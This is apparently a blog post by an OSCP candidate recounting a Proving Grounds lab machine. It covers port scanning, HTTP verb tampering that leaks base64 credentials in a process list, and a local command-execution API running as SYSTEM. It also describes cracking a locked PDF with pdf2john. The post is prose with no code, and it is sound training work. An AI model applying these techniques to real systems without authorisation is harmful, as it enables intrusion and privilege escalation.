OSCP Practice Sensitive Information Disclosure

Stewart Beam

2 Oct, 2022

OSCP Practice Sensitive Information Disclosure

OSCP Practice Sensitive Information Disclosure

October 2022 is OSCP practice month. I am reviewing Proving Ground machines in prep for what I think could be my last exam attempt. Write ups will be done for each machine, but wont post the complete exploit chain. The title will just be listing a specific type of vulnerability. There will also be a high level summary of the attack path, and a basic breakdown of the method I used to exploit the machine. I think a lot of people don’t want it to be easy to find exact write-ups for the boxes. If people do want that, there is a write up, and hints on the Proving Grounds site.

NMAP for Initial Port Scans

For my initial NMAP scans to check open ports, I run a really simple script. Previously I had tested using some automated enumeration tools. They generally provided more information than I needed, and most of it wasn’t specifically useful for me specifically. Now for OSCP type boxes I kick off my simple script and it just runs a top 1000 tcp ports scan with -sC and -sV options set, then does a full port scan with no options, and a top 100 UDP ports scan. This is easy and covers initial scanning and makes sure I don’t become distracted and not run a UDP scan, or full scan.

If I get any interesting ports from my full scan, I will do another scan on them to get more information.

On this host, port 8089 turned out being the most interesting port initially.

The DevOps Dashboard

The web server on port 8089 was running a dashboard with 3 buttons. Clicking them didn’t appear to do anything, but if we looked at the page source, we could see that they would send up to a web server on port 33333.

Here, we can see the endpoints we are being sent to, when we make the request.

If we went to the web server on 33333 with a GET request, we didn’t receive any sensitive information.

If we tried HTTP verb tampering, we found that by sending a POST request to the “list-running-procs”, we ended up getting sensitive information back.

A list of running processes on the machine is displayed to us. The first interesting thing that stands out are base64 encoded credentials for a user. These credentials actually provided access to read access to the FTP server, and remote user level access with SSH.

From here you can also see that there is another web server running. In the list of processes, there is a ws80.ps1. This is similar to the ws8089.ps1 and ws33333.ps. Both of those are web servers, so we can check the local host port 80 for another one.

Using netstat -ano shows us that port 80 is listening on the host.

Sending a request to port 80 with curl will identify it is running a dev-api. All the responses here identify the machine, but as a simple summary, we can url encode commands and pass them to the api. It is running as nt/system, allowing for escalation of privilege.

What if we didn’t notice the other web server

If we didn’t notice the web server, there was another piece of sensitive information we could find. Looking on the ftp server, identified a pdf file. The file was locked, but we could gain access to it by cracking the password. The tool pdf2john.pl is on Kali by default, and can get us a hash to crack. Once we crack the hash, the PDF identifies that there is an API on port 80 that executes commands. That should help anyone that didn’t see the server earlier, and should be the intended way to find it.